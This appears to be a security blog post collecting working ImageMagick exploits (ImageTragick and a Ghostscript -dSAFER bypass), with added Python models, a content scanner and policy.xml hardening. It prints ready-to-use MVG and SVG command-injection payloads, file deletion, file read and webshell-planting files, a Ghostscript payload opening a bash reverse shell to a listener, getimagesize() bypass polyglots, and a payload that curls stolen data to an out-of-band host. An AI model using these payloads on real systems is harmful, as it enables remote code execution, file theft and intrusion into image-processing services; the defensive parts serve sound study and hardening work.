ImageMagick exploits

Uncategorized  Admin  2 months ago (07-03)  75 views  0 comments

Source: https://www.exploit-db.com/exploits/39767

CVE-2016-3714 RCE analysis

ImageMagick hands an https:// URL (reached here through the url() fill in MVG and the <image> href in SVG) to an external delegate. In the vulnerable versions the delegates.xml entry is a shell command template ("wget" -q -O "%o" "https:%M") and the filename is pasted into %M without escaping, so a " inside the URL closes the quoted argument and |ls "-la" runs as a second command. Fixed in 6.9.3-10 / 7.0.1-1.

exploit.mvg
-=-=-=-=-=-=-=-=-
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|ls "-la)'
pop graphic-context

exploit.svg
-=-=-=-=-=-=-=-=-
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="640px" height="480px" version="1.1"
xmlns="http://www.w3.org/2000/svg" xmlns:xlink=
"http://www.w3.org/1999/xlink">
<image xlink:href="https://example.com/image.jpg&quot;|ls &quot;-la"
x="0" y="0" height="640px" width="480px"/>
</svg>
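Added example (this editor's code, not from the page or from ImageMagick): the delegate-expansion step behind the two PoCs above, modelled in Python. HTTPS_DELEGATE copies the pre-fix delegates.xml template for https; POC_URL_REST is the part of the exploit.mvg URL after https:; the allow-list check is an assumption about what a hardened caller should do, not ImageMagick's own sanitizer. Running it shows the expanded command splitting into two shell stages, the second being ls -la.

```python
# Added example (not from the page or ImageMagick): how the CVE-2016-3714
# delegate injection turns a "URL" into a second shell command, and the kind
# of input check that stops it before a shell template is reached.
import shlex
import string

# Mirrors the pre-fix delegates.xml entry for https (ImageMagick 6.9.3-9):
#   <delegate decode="https" command="&quot;wget&quot; -q -O &quot;%o&quot; &quot;https:%M&quot;"/>
HTTPS_DELEGATE = '"wget" -q -O "%o" "https:%M"'

# Everything after "https:" in exploit.mvg's fill url(...) (constructed from the page's PoC).
POC_URL_REST = '//example.com/image.jpg"|ls "-la'
BENIGN_URL_REST = "//example.com/image.jpg"

# Shell control operators that start a new command / pipeline stage.
SEPARATORS = {"|", "||", ";", "&", "&&"}


def expand_delegate(template, url_rest, output="/tmp/magick-XXXXXX"):
    """Plain %-token substitution with no escaping: this is the bug."""
    return template.replace("%o", output).replace("%M", url_rest)


def pipeline_stages(command):
    """Tokenise like /bin/sh and split on control operators.
    More than one stage means the URL smuggled in a command."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    stages, current = [], []
    for tok in lexer:
        if tok in SEPARATORS:
            stages.append(current)
            current = []
        else:
            current.append(tok)
    stages.append(current)
    return stages


# Allow-list for the URL remainder (assumption, this example's own): no
# quote, backtick, $, backslash, whitespace or control operator may pass.
SAFE_URL_CHARS = frozenset(string.ascii_letters + string.digits + "-._~:/?=%&+,@")


def is_safe_url_rest(url_rest):
    return url_rest != "" and all(c in SAFE_URL_CHARS for c in url_rest)


def render_delegate_command(url_rest):
    """What a hardened caller does: refuse anything off the allow-list before
    it reaches the template (better still, exec wget with an argv list and no shell)."""
    if not is_safe_url_rest(url_rest):
        raise ValueError("refusing URL with shell-significant characters: %r" % url_rest)
    return expand_delegate(HTTPS_DELEGATE, url_rest)


if __name__ == "__main__":
    cmd = expand_delegate(HTTPS_DELEGATE, POC_URL_REST)
    print(cmd)
    for i, stage in enumerate(pipeline_stages(cmd)):
        print("stage %d: %s" % (i, stage))
    print(render_delegate_command(BENIGN_URL_REST))
```

The stage split is what matters when triaging: a "URL" that yields more than one stage after expansion was never a URL. Note that forbidding only the double quote is not enough, since `$`, backticks and backslashes are interpreted inside double quotes too; that is why the allow-list is narrow rather than a deny-list.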

 

CVE-2016-3718 blind SSRF (no response echoed)

The url coder fetches the target through the same http/https delegate, but nothing from the response is returned to the uploader, so you need an out-of-band listener (DNS or HTTP) at the target address to see the hit.

ssrf.mvg
-=-=-=-=-=-=-=-=-
push graphic-context
viewbox 0 0 640 480
fill 'url(http://example.com/)'
pop graphic-context

 

CVE-2016-3715 arbitrary file deletion via the ephemeral: pseudo-protocol

The ephemeral coder reads the named file as an image and then deletes it, so any file the ImageMagick process can unlink is gone after the convert.

delete_file.mvg
-=-=-=-=-=-=-=-=-
push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'ephemeral:/tmp/delete.txt'
pop graphic-context

 

CVE-2016-3716 file read/write via the msl: pseudo-protocol (turn an image-embedded webshell into a .php file)

The MSL script has to already exist on the target at a known path (here /tmp/msl.txt), as does the image carrying the PHP payload (/tmp/image.gif); the convert then copies it to a web-served path under a .php name.

file_move.mvg
-=-=-=-=-=-=-=-=-
push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'msl:/tmp/msl.txt'
pop graphic-context

/tmp/msl.txt
-=-=-=-=-=-=-=-=-
<?xml version="1.0" encoding="UTF-8"?>
<image>
<read filename="/tmp/image.gif" />
<write filename="/var/www/shell.php" />
</image>

 

CVE-2016-3717 local file read via the label: pseudo-protocol

label:@<path> makes ImageMagick read the file and render its text into the output image, which comes back to the attacker as the "converted" picture.

file_read.mvg
-=-=-=-=-=-=-=-=-
push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'label:@/etc/passwd'
pop graphic-context

 

CVE-2018-16509 ImageMagick + Ghostscript reverse shell

ImageMagick passes PS/EPS/PDF input to gs, and it selects the coder from the %!PS magic rather than the file extension, so a .gif or .jpg upload with this content still reaches Ghostscript. The payload bypasses -dSAFER (fixed in Ghostscript 9.24); replace LISTENER_IP with the host running the listener (nc -lvnp 8080).

%!PS
userdict /setpagedevice undef
legal
{ null restore } stopped { pop } if
legal
mark /OutputFile (%pipe%bash -c 'bash -i >& /dev/tcp/LISTENER_IP/8080 0>&1') currentdevice putdeviceprops
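Hardening, as an added configuration example (not from the page): the policy.xml rules that deny every coder the PoCs on this page use, following the ImageTragick advisory list plus the Ghostscript-backed coders. The HTTP entry and the file location mentioned below are assumptions; check what your build actually loads with identify -list policy (ImageMagick 6) or magick -list policy (ImageMagick 7).

```xml
<!-- policy.xml fragment (added example): deny the coders the PoCs above rely on -->
<policymap>
  <!-- ImageTragick (CVE-2016-3714 .. CVE-2016-3718): url/https delegates, MVG, MSL, EPHEMERAL -->
  <policy domain="coder" rights="none" pattern="EPHEMERAL" />
  <policy domain="coder" rights="none" pattern="URL" />
  <policy domain="coder" rights="none" pattern="HTTP" />
  <policy domain="coder" rights="none" pattern="HTTPS" />
  <policy domain="coder" rights="none" pattern="MVG" />
  <policy domain="coder" rights="none" pattern="MSL" />
  <policy domain="coder" rights="none" pattern="TEXT" />
  <policy domain="coder" rights="none" pattern="SHOW" />
  <policy domain="coder" rights="none" pattern="WIN" />
  <policy domain="coder" rights="none" pattern="PLT" />
  <!-- label:@/etc/passwd and any other @file indirection -->
  <policy domain="path" rights="none" pattern="@*" />
  <!-- CVE-2018-16509: keep Ghostscript out of the pipeline entirely -->
  <policy domain="coder" rights="none" pattern="PS" />
  <policy domain="coder" rights="none" pattern="PS2" />
  <policy domain="coder" rights="none" pattern="PS3" />
  <policy domain="coder" rights="none" pattern="EPS" />
  <policy domain="coder" rights="none" pattern="PDF" />
  <policy domain="coder" rights="none" pattern="XPS" />
</policymap>
```

On Debian/Ubuntu the file is typically /etc/ImageMagick-6/policy.xml (assumed path). The policy is defence in depth, not a substitute for upgrading: ImageTragick is fixed from 6.9.3-10 / 7.0.1-1 and the -dSAFER bypass from Ghostscript 9.24, and a rule only blocks a coder that is named, so re-check the list whenever a new coder-based issue is published.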

 

 

Addendum: bypassing a getimagesize() check

If the upload handler validates the image with getimagesize(), none of the PoCs above pass, because getimagesize() does not recognise formats such as PostScript or MVG.

How do we get around that? getimagesize() does recognise XBM, and its XBM probe only scans the file for #define <name>_width / #define <name>_height lines, wherever they occur. ImageMagick, meanwhile, picks its coder from the content (push graphic-context / viewbox for MVG, %!PS for PostScript). Appending XBM defines therefore gives a file that PHP reports as a 200x200 XBM while ImageMagick still parses it as MVG or PostScript:

poc.mvg

push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.0/oops.jpg"|"`id`)'
pop graphic-context
#define xlogo_width 200
#define xlogo_height 200

 

 

poc.gif

%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
 
/test {
#define xlogo64_width 64
#define xlogo64_height 64
}
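Added example (not from the page or the referenced write-up): a Python model of getimagesize()'s XBM probe next to a content scan, run over the two polyglots above, the SVG PoC and a genuine XBM. The samples are constructed, the probe approximates PHP's php_get_xbm() (assumption), and the indicator regexes are the example's own.

```python
# Added example (not from the page): content-based triage of an uploaded
# "image", beside a model of PHP's getimagesize() XBM probe, to show why the
# polyglots above pass the size check yet are still MVG / PostScript to ImageMagick.
import re

# Indicators for the payload families shown on this page (example's own patterns).
INDICATORS = {
    "mvg_script":      re.compile(rb"^\s*push\s+graphic-context", re.M | re.I),
    "postscript":      re.compile(rb"%!PS"),
    "shell_in_url":    re.compile(rb"url\s*\([^)]*[\"'`|;]", re.I),      # fill 'url(...")|ls ...'
    "svg_href_quote":  re.compile(rb"href\s*=\s*\"[^\"]*&quot;", re.I),  # xlink:href="...&quot;|ls
    "ephemeral_coder": re.compile(rb"\bephemeral:", re.I),
    "msl_coder":       re.compile(rb"\bmsl:", re.I),
    "label_at_read":   re.compile(rb"\blabel:@", re.I),
    "gs_pipe_device":  re.compile(rb"%pipe%", re.I),
}

XBM_DEFINE = re.compile(rb"^#define\s+(\S+)\s+(\d+)", re.M)


def xbm_size(data):
    """Approximation (assumption) of getimagesize()'s XBM probe: walk every line
    for '#define <name>_width N' and '#define <name>_height N'. They may sit
    anywhere in the file, which is exactly what the polyglots rely on."""
    width = height = None
    for name, value in XBM_DEFINE.findall(data):
        suffix = name.rsplit(b"_", 1)[-1]
        if suffix == b"width":
            width = int(value)
        elif suffix == b"height":
            height = int(value)
        if width is not None and height is not None:
            return (width, height)
    return None


def scan(data):
    """Verdict by content, independent of what the magic-based probe says."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(data)]
    return {"xbm_size": xbm_size(data), "indicators": hits,
            "verdict": "reject" if hits else "accept"}


# Constructed samples: the two polyglots from the addendum, the SVG PoC and a real XBM.
POC_MVG = b"""push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.0/oops.jpg"|"`id`)'
pop graphic-context
#define xlogo_width 200
#define xlogo_height 200
"""

POC_PS = b"""%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%id) currentdevice putdeviceprops

/test {
#define xlogo64_width 64
#define xlogo64_height 64
}
"""

POC_SVG = (b'<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">'
           b'<image xlink:href="https://example.com/image.jpg&quot;|ls &quot;-la" x="0" y="0"/></svg>')

REAL_XBM = b"""#define dot_width 8
#define dot_height 8
static unsigned char dot_bits[] = {
   0x00, 0x7e, 0x42, 0x42, 0x42, 0x42, 0x7e, 0x00 };
"""

if __name__ == "__main__":
    for label, sample in (("poc.mvg", POC_MVG), ("poc.gif", POC_PS),
                          ("exploit.svg", POC_SVG), ("dot.xbm", REAL_XBM)):
        print(label, scan(sample))
```

The point of running both checks side by side: the probe reports 200x200 for poc.mvg and 64x64 for poc.gif, exactly as getimagesize() would, while the content scan rejects both. A size or magic check is a format guess, not a safety check; re-encoding the upload with the coder policy above in place, or rejecting on content like this, is what actually keeps MVG and PostScript away from ImageMagick.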

 

References:

https://www.anquanke.com/post/id/164819

https://www.freebuf.com/vuls/189776.html

https://www.leavesongs.com/PENETRATION/when-imagemagick-meet-getimagesize.html

https://hackerone.com/reports/403417

 

https://www.freebuf.com/vuls/125613.html    (How I found an ImageMagick vulnerability in Facebook and earned a $40,000 bounty; DNS probing)

push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'https://127.0.0.1/x.php?x=%60curl "http://dnslog/" -d @- > /dev/null%60'
pop graphic-context

Tip: pipe something small and identifying into the callback, e.g. cat /proc/version | base64.
